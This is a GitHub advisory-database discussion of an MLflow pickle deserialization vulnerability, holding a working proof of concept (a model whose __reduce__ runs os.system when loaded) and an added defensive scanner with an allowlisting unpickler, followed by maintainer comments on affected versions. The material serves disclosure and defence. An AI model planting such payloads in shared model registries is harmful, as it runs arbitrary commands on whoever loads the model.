github / advisory-database

Security vulnerability database inclusive of CVEs and GitHub originated security advisories from the world of open source software.
Creative Commons Attribution 4.0 International

[GHSA-ghv6-9r9j-wh4j] MLFlow unsafe deserialization #4546

Closed (litios closed this 3 months ago)

litios commented 3 months ago

Updates

Comments: Versions above 2.13.1 are affected, tested on 2.14.1.

```console
$ python3 exploit.py
Successfully registered model 'PyfuncPickleTest'.
Created version '1' of model 'PyfuncPickleTest'.
$ rm -rf /tmp/pwned
$ python3 server.py
$ ls /tmp/pwned
/tmp/pwned
$ cat exploit.py server.py
```

```python
# exploit.py: logs a pyfunc model whose attribute carries a pickle __reduce__ payload.
import mlflow


class PmdarimaWrapper(mlflow.pyfunc.PythonModel):
    def __init__(self):
        import os

        class RunCommand:
            # On unpickling, this object turns into a call to os.system("touch /tmp/pwned").
            def __reduce__(self):
                return (os.system, ("touch /tmp/pwned",))

        # Nothing runs here; the call is only recorded when the model is serialized.
        self.command = RunCommand()


with mlflow.start_run():
    wrapper = PmdarimaWrapper()
    mlflow.pyfunc.log_model(
        artifact_path="model",
        python_model=wrapper,
        registered_model_name="PyfuncPickleTest",
    )
```

```python
# server.py: whoever loads the registered model deserializes the payload, and the command runs.
import mlflow

logged_model = "models:/PyfuncPickleTest/1"
loaded_model = mlflow.pyfunc.load_model(logged_model, dst_path="/tmp/pyfunc_model")
```

```console
$ pip3 freeze | grep mlflow
mlflow==2.14.1
```
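The report above shows the `__reduce__` payload firing inside `load_model`. The following is an added example of the check the loading side would want before unpickling; it is my code, not code from the issue or from MLflow. It builds a constructed payload of the same shape with the standard library `pickle` (MLflow itself serializes with cloudpickle, so a real allowlist would have to cover that format's own classes), statically lists the globals the stream would import using `pickletools`, and then loads only through an `Unpickler` whose `find_class` refuses anything outside an allowlist. `SAFE_GLOBALS`, `MaliciousModel`, `find_globals`, `is_suspicious` and `safe_loads` are names I chose for the demonstration.

```python
import io
import os
import pickle
import pickletools

# Globals a plain-data pickle is allowed to import. This allowlist is an assumption
# for the demo; a real loader would enumerate what its model format legitimately needs.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}

# Opcodes that push a str onto the unpickler stack; STACK_GLOBAL (protocol 4) reads
# its module and attribute name from the two most recent ones.
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


class MaliciousModel:
    """Stand-in for the attribute in the report: pickles to a call to os.system.
    pickle.dumps only records the call; nothing runs until a load."""

    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned",))


def build_malicious_pickle(protocol: int = 4) -> bytes:
    """Constructed sample payload shaped like the reported one (never loaded here).
    On Linux the recorded global is posix.system, since that is os.system.__module__."""
    return pickle.dumps({"command": MaliciousModel()}, protocol=protocol)


def find_globals(data: bytes) -> list:
    """Static triage: (module, name) pairs the stream would import, found without
    executing it. Handles the GLOBAL form (protocol <= 3) and the STACK_GLOBAL form
    (protocol 4), following MEMOIZE/PUT/GET so memoized strings still resolve."""
    found = []
    stack_strs = []   # approximate view of str values pushed on the unpickler stack
    memo = {}         # memo slot -> str, or None when the slot holds a non-str object
    memo_next = 0     # next slot MEMOIZE will fill
    last = None       # most recently pushed value, if it was a str
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in STRING_OPS:
            last = arg
            stack_strs.append(arg)
        elif name == "MEMOIZE":
            memo[memo_next] = last
            memo_next += 1
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            stack_strs.append(last)
        elif name == "GLOBAL":
            # pickletools renders the newline-terminated pair as "module name"
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
            last = None
        elif name == "STACK_GLOBAL":
            if len(stack_strs) >= 2:
                found.append((stack_strs[-2], stack_strs[-1]))
            last = None
        else:
            last = None
    return found


def is_suspicious(data: bytes) -> bool:
    """True if the stream imports anything outside the allowlist."""
    return any(g not in SAFE_GLOBALS for g in find_globals(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Enforcement: the unpickler calls find_class when it hits GLOBAL/STACK_GLOBAL,
    which happens before the REDUCE that would invoke the callable, so a blocked
    global is never looked up, let alone called."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"pickle tried to import {module}.{name}; refusing to load")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    payload = build_malicious_pickle()
    print("globals:", find_globals(payload), "suspicious:", is_suspicious(payload))
    try:
        safe_loads(payload)
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)
```

The opcode scan is only triage (it models the stack loosely and would not follow a hand-crafted stream exactly); the `find_class` gate is the part that actually prevents the call. Neither makes it safe to load pickles from a registry you do not control, which is the situation the report describes: the payload runs on whichever host calls `load_model`, not on the one that logged the model.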
shelbyc commented 3 months ago

👋 Hi @litios, normally we don't have a lower bound with no upper bound on an advisory unless the advisory is about a malicious package. However, I'm accepting the contribution with 2.14.1 as the most recent affected version and you'll still get credit on the advisory for alerting us to the fact that 2.14.1 is vulnerable.

advisory-database[bot] commented 3 months ago

Hi @litios! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!

litios commented 3 months ago

Hi @shelbyc, thanks! That makes sense :)

I would like to point out that this advisory relates to several others that all follow pickle deserialization attacks, tracked in this issue

I warned the upstream developers that most certainly the rest of the advisories need an update too due to the quick release cycle of the project. Let me know if there is anything else I can help with.